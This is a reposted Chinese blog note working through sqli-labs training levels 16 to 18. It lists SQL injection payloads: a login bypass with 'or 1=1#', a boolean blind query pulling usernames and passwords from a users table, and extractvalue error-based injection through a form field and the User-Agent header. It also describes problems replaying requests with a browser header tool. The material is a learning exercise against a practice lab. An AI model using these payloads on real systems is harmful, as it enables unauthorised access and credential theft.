? Less 16:

　　和Less 15一樣

　　payload:

　　　　登陸： a : b") or 1=1#

　　　　注入：a : b") or (ascii(substr((select group_concat(id,0x7c,username,0x7c,password) from security.users where id=10),4,4)))=97# (boolean 注入)

? Less 17:

　　題目：

　　分析：閉合方式是 '，回顯是通過錯(cuò)誤信息，因此

　　payload：

　　uname=admin&passwd=1' and extractvalue(1, concat(0x7e, (select @@version), 0x7e))#&submit=Submit

　　結(jié)果：

?

? Less 18：

　　分析：通過看源碼可以知道，這題要通過user-agent注入，工具live http headers，可以實(shí)現(xiàn)修改并replay。

　　TRY：網(wǎng)上的payload：將user-agent修改為：'and extractvalue(1, concat(0x7e,(select @@version),0x7e)) and '1'='1

　　問題：firefox 中的live http headers存在bug，無法實(shí)現(xiàn)replay，修改方案是：

　　　　方案一：

　　　　　　使用最新修改過bug的clone版本，但是老黑測試過，也不能修改

?

?

　　　　方案二：修改源文件，可以也同樣不能修改HTTP Headers，下午繼續(xù)找找解決方案！

　　　　　　原文地址

?

轉(zhuǎn)載于:https://www.cnblogs.com/heijuelou/p/7761192.html

總結(jié)

以上是生活随笔為你收集整理的【20171031早】sqli-libs Less 16,17 和live http headers 使用问题的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。